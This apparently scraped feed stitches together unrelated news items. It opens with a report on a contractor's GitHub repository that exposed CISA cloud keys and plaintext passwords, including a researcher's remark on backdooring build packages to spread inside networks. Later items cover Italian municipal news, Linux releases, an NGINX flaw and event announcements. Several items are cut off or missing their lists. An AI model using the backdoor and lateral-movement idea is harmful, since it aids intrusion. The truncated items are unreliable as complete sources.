The GitHub repository that Valadon flagged was named “Private-CISA,” and it harbored a vast number of internal CISA/DHS credentials and files, including cloud keys, tokens, plaintext passwords, logs and other sensitive CISA assets.
Valadon said the exposed CISA credentials represent a textbook example of poor security hygiene, noting that the commit logs in the offending GitHub account show that the CISA administrator disabled the default setting in GitHub that blocks users from publishing SSH keys or other secrets in public code repositories.
“Passwords stored in plain text in a csv, backups in git, explicit commands to disable GitHub secrets detection feature,” Valadon wrote in an email. “I honestly believed that it was all fake before analyzing the content deeper. This is indeed the worst leak that I’ve witnessed in my career. It is obviously an individual’s mistake, but I believe that it might reveal internal practices.”
One of the exposed files, titled “importantAWStokens,” included the administrative credentials to three Amazon AWS GovCloud servers. Another file exposed in their public GitHub repository — “AWS-Workspace-Firefox-Passwords.csv” — listed plaintext usernames and passwords for dozens of internal CISA systems. According to Caturegli, those systems included one called “LZ-DSO,” which appears short for “Landing Zone DevSecOps,” the agency’s secure code development environment.
Philippe Caturegli, founder of the security consultancy Seralys, said he tested the AWS keys only to see whether they were still valid and to determine which internal systems the exposed accounts could access. Caturegli said the GitHub account that exposed the CISA secrets exhibits a pattern consistent with an individual operator using the repository as a working scratchpad or synchronization mechanism rather than a curated project repository.
“The use of both a CISA-associated email address and a personal email address suggests the repository may have been used across differently configured environments,” Caturegli observed. “The available Git metadata alone does not prove which endpoint or device was used.”
The Private CISA GitHub repo exposed dozens of plaintext credentials for important CISA GovCloud resources.
Caturegli said he validated that the exposed credentials could authenticate to three AWS GovCloud accounts at a high privilege level. He said the archive also includes plain text credentials to CISA’s internal “artifactory” — essentially a repository of all the code packages they are using to build software — and that this would represent a juicy target for malicious attackers looking for ways to maintain a persistent foothold in CISA systems.
“That would be a prime place to move laterally,” he said. “Backdoor in some software packages, and every time they build something new they deploy your backdoor left and right.”
In response to questions, a spokesperson for CISA said the agency is aware of the reported exposure and is continuing to investigate the situation.
“Currently, there is no indication that any sensitive data was compromised as a result of this incident,” the CISA spokesperson wrote. “While we hold our team members to the highest standards of integrity and operational awareness, we are working to ensure additional safeguards are implemented to prevent future occurrences.”
A review of the GitHub account and its exposed passwords show the “Private CISA” repository was maintained by an employee of Nightwing, a government contractor based in Dulles, Va. Nightwing declined to comment, directing inquiries to CISA.
CISA has not responded to questions about the potential duration of the data exposure, but Caturegli said the Private CISA repository was created on November 13, 2025. The contractor’s GitHub account was created back in September 2018.
The GitHub account that included the Private CISA repo was taken offline shortly after both KrebsOnSecurity and Seralys notified CISA about the exposure. But Caturegli said the exposed AWS keys inexplicably continued to remain valid for another 48 hours.
CISA is currently operating with only a fraction of its normal budget and staffing levels. The agency has lost nearly a third of its workforce since the beginning of the second Trump administration, which forced a series of early retirements, buyouts, and resignations across the agency’s various divisions.
The now-defunct Private CISA repo showed the contractor also used easily-guessed passwords for a number of internal resources; for example, many of the credentials used a password consisting of each platform’s name followed by the current year. Caturegli said such practices would constitute a serious security threat for any organization even if those credentials were never exposed externally, noting that threat actors often use key credentials exposed on the internal network to expand their reach after establishing initial access to a targeted system.
“What I suspect happened is [the CISA contractor] was using this GitHub to synchronize files between a work laptop and a home computer, because he has regularly committed to this repo since November 2025,” Caturegli said. “This would be an embarrassing leak for any company, but it’s even more so in this case because it’s CISA.”
Comunicato a cura dell’uff. Stampa del Comune di Livorno.
Livorno, 18 maggio 2021 – Negli ultimi anni le società partecipate del Comune
di Livorno hanno consolidato risultati positivi sotto il profilo economico,
gestionale e della qualità dei servizi erogati ai cittadini, confermando il valore
strategico del sistema pubblico locale e la capacità delle aziende di affrontare le
sfide dell’innovazione, della sostenibilità e dell’efficienza amministrativa.
Il quadro che emerge dai bilanci evidenzia una crescita costante della solidità
patrimoniale e organizzativa di realtà fondamentali per il territorio come
Esteem Srl, Casalp Spa, AAMPS Spa, Farma.Li Srl e ASA Spa. I bilanci 2025,
alcuni dei quali in corso di approvazione in questi giorni ed entro il 30 giugno,
come previsto dal Codice Civile, non fanno eccezione, ma anzi confermano
questo trend positivo.
In particolare, AAMPS Spa ha registrato bilanci in utile negli ultimi cinque
esercizi, confermando il raggiungimento di un equilibrio economico e
finanziario stabile dopo il percorso di risanamento completato negli anni
precedenti.
Anche Casalp Spa ha dimostrato un consolidamento del ruolo operativo svolto
per i Comuni dell’area livornese ed in particolare si è distinta in questi anni per
le azioni di recupero delle morosità e per la capacità di guidare, su un tema
complesso ed attuale come quello dell’abitare, politiche finalizzate a gestire un
ambito che è sempre più lontano dalla gestione patrimoniale e sempre più
vicino a quello sociale.
Positivi anche i segnali provenienti da ASA Spa, che continua a rappresentare
un presidio essenziale per lo sviluppo infrastrutturale e ambientale del
territorio, mantenendo elevati standard di servizio e una struttura societaria
solida.
Crescita significativa anche per Esteem Srl, realtà attiva nei servizi informatici,
nel supporto alla gestione dei tributi comunali e nella gestione della sosta a
pagamento, che negli ultimi esercizi ha registrato un incremento del fatturato e
dell’occupazione, rafforzando il proprio ruolo di supporto tecnologico alla
pubblica amministrazione locale, confermando di essere una struttura in
espansione e capace di innovare i servizi digitali rivolti ai cittadini.
Importanti risultati sono stati raggiunti inoltre da Farma.Li Srl, con i propri
bilanci che negli ultimi anni evidenziano una gestione economica positiva e un
progressivo rafforzamento della capacità finanziaria dell’azienda. Farma.Li ha
proseguito il percorso di ammodernamento delle farmacie comunali, puntando
sulla qualità dell’assistenza, sulla prossimità territoriale e sull’innovazione dei
servizi sanitari e socioassistenziali.
Nel complesso, il sistema delle partecipate del Comune di Livorno conferma
dunque una traiettoria positiva, caratterizzata da investimenti, equilibrio
economico e miglioramento della qualità dei servizi pubblici locali. Un
patrimonio amministrativo e industriale che rappresenta un elemento
strategico per la crescita della città, per la tutela dell’interesse pubblico e per la
capacità del territorio di affrontare con solidità le sfide future.
Il sindaco Luca Salvetti ha aperto l’incontro sottolineando come le società
partecipate siano uno strumento imprescindibile per la gestione della città e dei
servizi ai cittadini. “Abbiamo lavorato sette anni sulla riorganizzazione e
l’aumento del personale, presentando numeri eloquenti, lo dimostrano i bilanci
in utile. Tutte e cinque le società principali (ASA, AMS, Farmali, Casalp e
Steam) hanno chiuso l’anno in positivo.
Il valore complessivo della produzione è di 208 milioni di euro, con un
incremento di 29 milioni rispetto al 2019.
Le aziende hanno raggiunto quota 1143 di personale con un aumento di 193
unità rispetto al 2019, diventando la terza realtà lavorativa del territorio dopo
l’ASL e il Comune stesso”.L’Assessora al Bilancio con delega alle Società Partecipate Viola Ferroni ha
ringraziato l’Ufficio Società Partecipate, che ha definito la “spina dorsale” dei
risultati ottenuti. “Ribadisco l’importanza della governance pubblica per
perseguire obiettivi di interesse collettivo, andando oltre il semplice dato di
bilancio. Farmali ha concentrato il focus sulla vicinanza ai cittadini ed alla
ristrutturazione delle farmacie. Casalp ha ottenuto buoni risultati nel recupero
crediti e nell’efficientamento degli alloggi. Esteem ha incrementato i servizi,
inclusa la recente gestione della sosta a pagamento. Aamps ha raggiunto la
stabilità dopo un passato complicato che ha fatto “tribolare”
l’Amministrazione”.Il direttore generale del Comune Nicola Falleni ha evidenziato il superamento
delle storiche criticità finanziarie delle partecipate: “che in passato
rappresentavano un “neo” nel bilancio comunale” ed ha fornito i dati del
bilancio consolidato 2024.“Il “gruppo” (Comune + aziende) conta oltre 2.200 dipendenti. Valore della
produzione totale: quasi 570 milioni di euro. Utile consolidato: circa 14 milioni
di euro. Patrimonio netto: 763 milioni di euro”.Aldo Iacomelli, Amministratore Unico AAMPS/Retiambiente ha dichiarato:
“Presenti e affidabili: con questi due aggettivi e in estrema sintesi sono nella
possibilità di descrivere la nostra azienda nel panorama delle municipalizzate
locali. Ogni giorno contribuiamo al decoro urbano con grande impegno e sforzo
da parte dei nostri operatori garantendo l’erogazione di servizi efficienti fin
dalle primissime ore della mattina sia sul versante della raccolta sia su quello
dello spazzamento. É importante sottolineare che per l’anno 2025 ci avvaliamo
di un utile di bilancio di 252mila euro. Un risultato che reputiamo importante
da affiancare all’evidenza di non avere registrato debiti. Siamo quindi orgogliosi
per quanto stiamo riuscendo complessivamente a fare, con uno sguardo di
ulteriore fiducia anche sul versante operativo essendo prossimi a realizzare,
avvalendoci anche di finanziamenti da parte della Regione Toscana, di due
ulteriori centri di raccolta per il corretto conferimento dei rifiuti dei cittadini. A
breve lanceremo anche una campagna di comunicazione rivolta a tutta la
cittadinanza per stringere ulteriormente il patto con i cittadini nel contrastare il
fenomeno degli abbandoni e aumentare le migliori azioni per la riduzione nella
produzione dei rifiuti indifferenziati, per la quale stiamo già registrando risultati
lusinghieri”.Claudio Puccetti, amministratore unico di Farmali ha definito l’azienda con gli
aggettivi “tranquillo” e “partecipativo”.
Ha sottolinea il buon clima lavorativo tra i 60 dipendenti distribuiti su 9
farmacie. Ha messo in risalto la totale autonomia finanziaria della società, “che
permette di autofinanziare gli investimenti (come le ristrutturazioni di varie
farmacie) senza ricorrere a finanziamenti esterni.L’obiettivo futuro è spostare
la missione del farmacista sempre più verso i servizi di telemedicina”.Marcello Canovaro presidente di Casalp ha utilizzato gli aggettivi “rigoroso” e
“partecipato” per definire il bilancio della società.
“La società ha superato pesanti difficoltà iniziate nel 2019 e ora chiude il
bilancio in positivo. Casalp non punta all’utile, ma a reinvestire ogni risorsa nel
mantenimento del patrimonio e in nuovi edifici.
Negli ultimi tre anni sono stati investiti oltre 50 milioni di euro nella provincia e
messi a disposizione degli assegnatari 592 appartamenti precedentemente
sfitti”.Stefano Taddia presidente di Asa sceglie gli aggettivi “collettivo” e “sostenibile”.
Esprime orgoglio per i 56,7 milioni di euro di investimenti effettuati nell’ultimo
anno, segnando un +150% rispetto al 2020.
Sottolinea come l’efficienza delle società di servizio pubblico sia un elemento
fondamentale per la sostenibilità e il benessere del territorio.Antonio Paladini amministratore unico di Esteem descrive l’azienda come
“consolidata” e “visionaria”.
Riporta una crescita enorme negli ultimi 12 anni: “il personale è passato da 9 a
40 dipendenti e il fatturato è salito da circa 450.000 euro a quasi 2 milioni di
euro. L’azienda si è evoluta accettando servizi nuovi e diversi, come la gestione
dei parcheggi, mantenendo però un’anima orientata all’innovazione informatica
per il futuro dei servizi ai cittadini”.Il Sindaco ha concluso la conferenza stampa ringraziando gli Uffici Comunali e i
due assessori che si sono succeduti nella gestione delle partecipate, Gianfranco Simoncini e Viola Ferroni.
L'articolo Bilanci in utile delle cinque aziende partecipate del Comune di Livorno proviene da Aamps Livorno.
Elvira Simoncini entra nella DX Hall of Fame: un riconoscimento storico. A Dayton le è stato conferito uno dei più prestigiosi riconoscimenti del mondo radioamatoriale: l’ingresso nella DX Hall of Fame, considerata da molti il vero e proprio “Premio Nobel” dei DXer.
L’International DX Convention l’ha scelta tra numerosi candidati provenienti da tutto il mondo, premiando il suo eccezionale contributo alla comunità DX internazionale. Il riconoscimento valorizza in particolare le sue tante DXpedition, affrontate per la maggior parte in solitaria, con grande competenza, determinazione e spirito di avventura.
Solo due donne al mondo fanno parte della DX Hall of Fame, ed Elvira è la prima ad aver ottenuto questo onore esclusivamente per la sua intensa attività operativa DX.
Un risultato straordinario che rende orgogliosa tutta la comunità radioamatoriale italiana.
Stella danzante, cosa ti condurrebbe sulla cima di una montagna, nel cuore di una foresta o… lungo i sentieri della parola?
Le tue gambe e… la poesia!
Via Alfieri è lieta di presentare la Sagra della Poesia Terrestre!
Si terrà presso il rifugio-cascinale Il Vespaio, nel Parco dell’Acquerino, a due passi dalla sorgente del Bisenzio, sabato 20 e domenica 21 giugno, per il solstizio d’estate.
La Sagra è un momento di festa e riscoperta, ed è anche un invito a chi pratica, legge, odia o ama l’arte dei versi a unirsi per condividere, conoscere e conoscersi, riconoscerci magari, poi chissà.
Strada Comunale di Luogomano 89, Cantagallo, PO.
🗺️https://maps.app.goo.gl/KuDWr2eXoDVqF8g27
Ma è meglio cercare "Bivio per rifugio il Vespaio" (https://maps.app.goo.gl/oRnCAfZesFvCCuu5A) e da lì seguire la strada sterrata fino al monumento partigiano, dove si può lasciare l'auto.
Sabato 20 giugno
16.00-16.30 | Ritrovo al monumento partigiano e camminata (circa 30’) con guida ambientale nel Parco dell’Acquerino, fino al rifugio 📯
18.00-20.00 | Poesia e viaggio:
La via del loto, con Luca Buonaguidi 🖋️
Pastorale. Beatrice di Pian degli Ontani e i poeti della montagna, con Paolo Ciampi 📖
20.00-21.00 | Convivio serale 🍻 +🍷+ 🥗
20.30-22.00 | Anti-slam, nomenomen con Ossi di Nutria 🎙️
22.00-23.30 | Lorena e Saul, Via Alfieri + Elena Romano (versi e musica e Saturno) 🎙️+ 🎹 + 🪐
23.30-01.00 | Apollinaire, menestrellerie degli Apollineo + microfono aperto accanto al fuoco 🎤+ 🎸+ 🔥
Domenica 21 giugno
10.00-11.00 | Colazione dei campioni 🥐+ ☕
11.00-13.00 | Libere letture viandanti, passeggiata poetica nel bosco guidata da Altavoz🌲+ 🐿️
13.00-14.30 | Lauto pasto e succo di sole 🥙+ 🥪+ 🧃
14.30-15.30 | Arcani inventati, vecchienuove canzoni di Frateasino 🎤+ 🎸
15.30-16.30 | Dell’amore e della natura. Omaggio a fumetti a Beatrice di Pian degli Ontani, con l'autrice Silvia Rocchi 📖
16.30-∞ | Domenica bestiale, Apollineo ad libitum 🎤+ 🎸
(Non fosse chiaro: almeno tre momenti del programma sono predisposti per la libera espressione dei partecipanti. Altri certamente da sé verranno. Ricorda, oltre al sacco-a-pelo, di portare i tuoi versi!)
Il posto è raggiungibile solo a piedi, con una camminata di circa trenta minuti dal punto in cui si può lasciare l’auto (in caso di necessità sarà comunque prevista una Panda-navetta). Ci sarà la possibilità di rimanere a dormire al rifugio nella notte tra sabato e domenica (lo consigliamo caldamente!), montando una tenda fuori oppure all’interno, in uno dei numerosi posti letto disponibili. Tutto è del tutto gratuito tranne i pasti, preparati con amore dai ragazzi del Vespaio.
Facci sapere se ci sarai, è importante per organizzarci al meglio, compila questo modulo: sagrapoesia.vado.li
bookworm). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.
trixie). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.
Der Radio Club des Montagnes Neuchâteloises «HB9LC» organisiert am Wochenende vom 30. und 31. Mai 2026 eine Funkaktivität im Chalet de La Serment.
Am Wochenende vom 30. und 31. Mai 2026 führt der Radio Club des Montagnes Neuchâteloises «HB9LC» einen gemeinsamen Funkbetrieb durch. Die Aktivität findet im Naturfreunde-Chalet «La Serment» statt, das auf dem Tête de Ran im Zentrum des Kantons Neuenburg liegt.
Dieses Treffen bietet Gelegenheit für technischen Austausch und Funkkontakte von einem erhöhten Standort aus. Die Verantwortlichen laden die Funkamateur-Gemeinschaft ein, den Anlass entweder vor Ort zu besuchen oder via HF-Verbindung zu begleiten.
Sämtliche logistischen Details und das Programm sind auf der offiziellen Webseite des Clubs abrufbar.
mni tnx to Philippe Metthez HB9EPM, Président, secrétaire et responsable du local de rencontre
Linux users have long faced a frustrating limitation with wireless earbuds: basic Bluetooth audio usually works, but advanced features often remain locked behind proprietary mobile apps. A new open-source project called BudsLink is trying to change that.
Designed specifically for Linux desktops, BudsLink adds support for battery monitoring, Active Noise Cancellation (ANC) controls, ambient sound modes, gesture customization, and other premium earbud features that are typically unavailable outside Android or iOS ecosystems.
For Linux users who rely on devices like AirPods, Sony earbuds, Samsung Galaxy Buds, or Nothing earbuds, this is a significant quality-of-life improvement.
BudsLink is an independent open-source application that communicates directly with supported Bluetooth earbuds using Linux Bluetooth protocols such as L2CAP and RFCOMM sockets. Instead of treating earbuds as simple audio devices, the application exposes many of the advanced controls usually hidden behind vendor apps.
The project currently supports multiple device families, including:
The application is available through Flatpak and can run across multiple Linux distributions.
Traditionally, Linux Bluetooth support has focused mainly on audio playback and microphone functionality. BudsLink goes much further by exposing premium earbud features directly within Linux.
Current capabilities include:
For many Linux users, these are features they’ve never had access to outside mobile apps.
Bluetooth earbuds have become increasingly dependent on proprietary ecosystems. Features like adaptive audio, transparency modes, or touch controls often require vendor-specific mobile applications that are unavailable on Linux.
That has created a frustrating situation where:
BudsLink aims to bridge that gap by reverse-engineering communication protocols and exposing those controls natively on Linux desktops.
Nel fine settimana torna Piano City Milano,
l’evento che trasforma Milano in un enorme palcoscenico diffuso a cielo aperto.
Dal 15 al 17 maggio, il festival proporrà più di 250 concerti gratuiti in oltre 140 luoghi sparsi per tutta la città.
Tra gli eventi più attesi ci sono quelli ospitati nei giardini della Villa Reale di Milano,
sede della Galleria d’Arte Moderna di Milano e simbolo storico della manifestazione.
Per tre giornate, questo spazio accoglierà esibizioni all’aperto dedicate al pianoforte, con un programma che unisce repertorio classico e sonorità contemporanee.
Ad aprire il festival, nella serata di venerdì, sarà Sofiane Pamart, protagonista del concerto inaugurale sul Main Stage della GAM.
Durante il weekend saliranno sul palco anche numerosi artisti italiani e internazionali, dando vita a un percorso musicale pensato per coinvolgere un pubblico di tutte le età.
L’accesso ai concerti sarà gratuito, anche se alcuni appuntamenti richiederanno la prenotazione online.
È proprio questa formula accessibile che continua a rendere Piano City uno degli eventi culturali più apprezzati sia dai milanesi sia dai turisti.
Anche sul web, infatti, viene spesso segnalato tra gli appuntamenti imperdibili della primavera milanese.
Tra musica dal vivo, arte e scenari iconici, Piano City Milano si conferma ancora una volta un’occasione speciale per scoprire e vivere Milano da una prospettiva diversa.
L'articolo Concerti gratuiti alla Villa Reale: la musica classica anima il centro di Milano proviene da InfoMilano.news.
Le Organizzazioni Sindacali USB Livorno e COBAS Lavoro Privato Livorno denunciano un fatto che ritengono estremamente grave, verificatosi in data 12 maggio 2026, presso la sede dell’Ispettorato Territoriale del Lavoro di Livorno, durante un tentativo di conciliazione tra la Cooperativa COOPLAT e cinque lavoratrici impiegate nell’appalto della committenza Unicoop Firenze presso il cantiere Fonti del Corallo – Via Gino Graziani - Livorno.
Il tentativo di conciliazione era stato richiesto dall’Organizzazione Sindacale al fine di sanare una situazione di applicazione irregolare dei turni che si protrae nel cantiere da anni, nonché per ottenere la regolarizzazione degli orari e la corretta applicazione del contratto di lavoro in essere.
Nel corso dell’ultimo dei tre incontri svolti presso l’ITL, la cooperativa ha presentato nuove proposte di variazione oraria che le lavoratrici, con il supporto delle OO.SS., hanno valutato come difficilmente accettabili, poiché relative a turni residuali rispetto a fasce orarie già assegnate ad altre lavoratrici che, a seguito del cambio di committenza, avevano prontamente sottoscritto le variazioni proposte dall’azienda. Tali modifiche, di fatto, formalizzavano orari già praticati senza alcuna regolarità rispetto ai contratti in essere, che peraltro non prevedono clausole elastiche o flessibili.
Durante l’ultimo incontro, a fronte della decisione di una lavoratrice di non sottoscrivere una proposta ritenuta peggiorativa rispetto alle condizioni del contratto vigente, la rappresentante legale della cooperativa si è espressa in modo non esplicito ma chiaramente udibile, chiedendo al responsabile delle risorse umane di attivare il licenziamento. Un’ipotesi già ventilata nei precedenti incontri e ormai diffusamente percepita nel cantiere tra le lavoratrici.
Riteniamo l'accaduto di una gravità inaudita e inaccettabile, resa ancor più intollerabile dal fatto di essersi verificato, sfacciatamente, all'interno di una sede istituzionale, in violazione di ogni principio di lealtà e correttezza.
Le rappresentanti sindacali presenti e la legale di riferimento non hanno ritenuto possibile far sottoscrivere alla lavoratrice alcun accordo né proseguire la discussione sulle ulteriori proposte, poiché la procedura non appariva genuina né realmente tutelante. La mancata accettazione della variazione oraria esponeva concretamente le lavoratrici al rischio di licenziamento, in un contesto caratterizzato da un’elevata discrezionalità aziendale, con possibili profili discriminatori legati all’essere o meno socia della cooperativa e a valutazioni puramente soggettive sul comportamento delle lavoratrici, considerate più o meno “compiacenti” nei confronti di responsabili e dirigenti.
Il tentativo di conciliazione si è ovviamente concluso con esito negativo. Le Organizzazioni Sindacali si riservano pertanto di attivare tutti gli strumenti sindacali a propria disposizione per rivendicare la tutela dei diritti delle lavoratrici e chiedono alla committenza di vigilare sull’appalto, assumendo una posizione chiara rispetto a comportamenti che ledono la qualità del lavoro e la dignità delle lavoratrici, molte delle quali operano da anni alle dipendenze della cooperativa anche in qualità di socie lavoratrici.
Unicoop Firenze, peraltro, è già stata più volte chiamata in causa e sollecitata a intervenire e a esprimersi nell’ambito di questo conflitto, sia indirettamente da COOPLAT, che ha ripetutamente dichiarato la necessità di modificare i turni per richieste ed esigenze della committenza stessa, sia direttamente dai sindacati, che hanno provveduto a informarla delle criticità emerse e delle conseguenze che tali scelte stanno producendo sulle condizioni di lavoro delle lavoratrici coinvolte, richiedendo inoltre un incontro finalizzato ad aprire un confronto congiunto sulla gestione dell’appalto e delle condizioni di lavoro nel cantiere di Porta a Terra.
Riteniamo inaccettabile quanto accaduto e lesivo del ruolo e della funzione di una sede istituzionale nella quale la mediazione è finalizzata a garantire tutela ed equilibrio tra tutte le parti coinvolte. Chiediamo il rispetto delle sedi, dei ruoli e di relazioni sindacali improntate alla correttezza, nelle quali non può trovare spazio alcuna forma, esplicita o velata, di minaccia di licenziamento nei confronti di chi non intenda sottoscrivere u
na proposta aziendale ritenuta peggiorativa rispetto alle condizioni precedenti, soprattutto nel momento in cui viene richiesto il rispetto del contratto.
Nessuna lavoratrice può essere lasciata indietro!
In the recent weeks I've been engaging Prot as an Emacs coach to help
with doing review passes over my upcoming ffs package as I work on
polishing and documenting it in preparation for offering it for
inclusion in GNU ELPA.
UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/
Today we had our third session where we started by reviewing and
talking about my recent changes to ffs, then ventured to other
Emacs-related topics with the overarching theme of the flexibility
and extensibility of GNU Emacs, including display-buffer-alist,
keyboard macros, defining a custom ox-bhtml Org export backend
derived from Org's ox-html for ultimate flexibility when exporting
my site's pages from Org to HTML, Org capture, plain text files and
Emacs's diary and how it compares to org-agenda, and keeping a
journal with the help of Emacs.
Here is the video recording of our session, which I share with Prot's permission:
You can view or download the full-resolution video from the Internet Archive.
Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:
(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)
Take care, and so long for now.
Una vulnerabilità critica rimasta nascosta per quasi due decenni sta scuotendo il mondo della sicurezza applicativa. I ricercatori di depthfirst hanno infatti identificato una falla nel modulo di rewrite di NGINX che potrebbe consentire a un attaccante remoto non autenticato di causare crash dei processi oppure, in determinate condizioni, ottenere esecuzione di codice remoto (RCE). […]
L'articolo NGINX Rift, rischio RCE per una falla rimasta nascosta 18 anni proviene da Securityinfo.it.
Fedora Hummingbird brings the same approach to the host OS as it does to containers to level up security.
Dal 19 al 21 maggio, al Polo Fibonacci dell’Università di Pisa, tre giorni con gli esperti di reti e innovazione digitale
Vincenzo Gallotto sarà tra i relatori di APMAT2026, l’evento nazionale di Assoprovider in programma il 5 giugno 2026 a Matera, presso Casa Cava. Avvocato, Data Protection Officer, consulente legale di Assoprovider e Responsabile delle liste AP-LEGAL e AP-CHATLEGAL, Gallotto interverrà sul tema “NIS2 – opportunità e percorso di adeguamento per gli operatori”. La Direttiva NIS2, […]
L'articolo Vincenzo Gallotto ad APMAT2026: NIS2, opportunità e percorso di adeguamento per gli operatori proviene da Assoprovider.
A test release of GNUtrition, 0.33.0rc2, is now available.
GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release makes some fixes to the gender option. It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).
Canonical has officially kicked off development planning for Ubuntu 26.10, the next interim release of the popular Linux distribution. Codenamed “Stonking Stingray,” the release is scheduled to arrive on October 15, 2026, continuing Ubuntu’s predictable six-month development cycle.
Although Ubuntu 26.10 is still in the early planning stages, the release roadmap already offers hints about what users can expect from the next generation of Ubuntu.
Ubuntu 26.10 follows the recently released Ubuntu 26.04 LTS “Resolute Raccoon”, which introduced major platform changes including Linux 7.0, GNOME 50, Wayland-only sessions, and expanded TPM-backed security features.
Unlike the LTS release, Ubuntu 26.10 will be a short-term support release, receiving updates for nine months instead of the five years offered by LTS editions.
These interim releases are typically used to introduce newer technologies and prepare the groundwork for future long-term Ubuntu versions.
Canonical confirmed that Ubuntu 26.10 will carry the codename “Stonking Stingray.”
As with previous Ubuntu releases, the codename follows the project’s long-running naming convention using:
The playful naming tradition remains one of Ubuntu’s most recognizable characteristics.
Canonical has already published the preliminary roadmap for Ubuntu 26.10 development. Major milestones currently include:
The toolchain upload process reportedly began in late April, officially opening the development cycle.
While Canonical has not yet finalized the complete feature set, several components are widely expected based on current development schedules.
GNOME 51Ubuntu 26.10 is likely to ship with GNOME 51, which is expected to be released roughly one month before Ubuntu 26.10 itself.
This would continue Ubuntu’s strategy of tracking recent GNOME desktop releases in interim versions.
Linux Kernel 7.2 or 7.3Reports suggest Ubuntu 26.10 may include either:
With the rise of Linux vulnerabilities, the kernel developers are now considering adding a component that could help temporarily mitigate against them… in the form of a kill switch.
Terra Infecta di Andrea Bagnato (Mack, 2026) è una controstoria dei paesaggi urbani e rurali italiani. Ricostruisce la distruzione delle zone umide venete, le politiche di «risanamento» urbano e spostamenti di popolazione a Napoli e Materia, e il periodo del confinamento in Lombardia durante la pandemia di Covid. Il libro è al tempo stesso una critica dell'igiene come dispositivo di controllo e una raccolta di momenti rivelatori di comunità, guarigione e resistenza.
Il 27 aprile 2026 Bagnato ha presentato Terra Infecta alla libreria Modo Infoshop di Bologna, affiancato da Chiara Davino, architetta e ricercatrice all'Università di Bologna, e Wu Ming 1. Buon ascolto.
APMAT26 rafforza il dialogo tra operatori indipendenti a livello europeo. Tra i protagonisti dell’evento nazionale di Assoprovider ci sarà anche AOTEC, l’associazione spagnola degli operatori locali TLC, punto di riferimento nel panorama europeo delle reti indipendenti. AOTEC riunisce imprese che, come molti associati Assoprovider, portano connettività, fibra, servizi digitali e innovazione nei territori, spesso dove […]
L'articolo AOTEC è partner internazionale di APMAT2026 proviene da Assoprovider.
APMAT26 amplia il confronto tra operatori e produttori di tecnologia. Tra gli sponsor dell’evento nazionale di Assoprovider ci sarà anche Tenda, realtà internazionale specializzata nello sviluppo e nella distribuzione di soluzioni per il networking. L’azienda propone un’offerta completa che include router Wi-Fi, sistemi mesh, switch, gateway, soluzioni per reti business ed enterprise wireless, CPE, base […]
L'articolo Tenda è sponsor di APMAT2026 proviene da Assoprovider.
APMAT26 rafforza il suo respiro internazionale. Tra gli sponsor dell’evento nazionale di Assoprovider ci sarà anche ALEA Soluciones, realtà spagnola specializzata nello sviluppo di soluzioni tecnologiche per operatori TLC, con una lunga esperienza a supporto di ISP, WISP e operatori locali. La presenza di ALEA contribuirà ad arricchire il confronto tra operatori indipendenti italiani ed […]
L'articolo ALEA Soluciones è sponsor di APMAT2026 proviene da Assoprovider.
APMAT26 continua il suo percorso insieme alle realtà che negli anni hanno accompagnato la crescita della community degli operatori di prossimità. Tra gli sponsor dell’edizione 2026 ci sarà anche SICE Telecom, azienda storica del settore TLC specializzata in soluzioni wireless, ponti radio, infrastrutture per WISP e ISP e distribuzione di tecnologie per reti professionali. Da […]
L'articolo SICE Telecom è sponsor di APMAT2026 proviene da Assoprovider.
APMAT26 continua a costruire connessioni tra operatori, tecnologie e visioni europee. Tra gli sponsor dell’edizione 2026 ci sarà anche Vayu, realtà italiana specializzata nello sviluppo di software e servizi di consulenza per ISP e WISP, con soluzioni dedicate agli operatori wired e wireless. Un’azienda che negli anni ha sviluppato un approccio fortemente orientato alle esigenze […]
L'articolo Vayu: sponsor APMAT 2026 proviene da Assoprovider.
APMAT26 ospiterà l’intervento dell’On. Enzo Amich, Deputato della Repubblica, membro della IX Commissione Trasporti, Poste e Telecomunicazioni della Camera dei Deputati e Presidente dell’Intergruppo parlamentare “Sostenibilità Digitale e Sovranità Tecnologica”. La sua partecipazione assume per Assoprovider un valore particolarmente significativo, perché rafforza un dialogo istituzionale aperto da tempo sui temi delle telecomunicazioni, delle infrastrutture digitali […]
L'articolo On. Enzo Amich ad APMAT26: infrastrutture digitali, territori e sovranità tecnologica proviene da Assoprovider.
APMAT26 ospiterà l’intervento di Gonzalo Elguezabal Ayala, rappresentante di AOTEC, l’associazione spagnola degli operatori locali di telecomunicazioni. La presenza di AOTEC rappresenta uno dei passaggi più significativi dell’edizione 2026: per la prima volta, il confronto promosso da Assoprovider si apre in modo strutturato al dialogo con una realtà associativa europea molto vicina all’esperienza degli Operatori […]
L'articolo Gonzalo Elguezabal Ayala ad APMAT26: il confronto europeo con AOTEC proviene da Assoprovider.
APMAT26 ospiterà l’intervento di José Carlos Oya Ortega, CEO di 7Play, che porterà all’evento la propria esperienza diretta come Operatore di Prossimità nel mercato spagnolo delle telecomunicazioni. La sua presenza rappresenta un’occasione importante per rafforzare il confronto tra operatori italiani e spagnoli, mettendo al centro esperienze concrete, modelli di crescita, strategie commerciali e sfide operative […]
L'articolo José Carlos Oya Ortega ad APMAT26: l’esperienza di 7Play nel mercato telco spagnolo proviene da Assoprovider.
APMAT26 ospiterà l’intervento di Pere Antentas Costa, CEO di Rede Aberta, una delle realtà più interessanti del panorama spagnolo delle telecomunicazioni territoriali. La sua presenza arricchirà il confronto internazionale dell’evento, offrendo agli Operatori di Prossimità italiani l’opportunità di conoscere da vicino un modello di sviluppo fondato su fibra ottica, accesso aperto, copertura delle aree rurali […]
L'articolo Pere Antentas Costa ad APMAT26: l’esperienza di Rede Aberta per le reti territoriali europee proviene da Assoprovider.
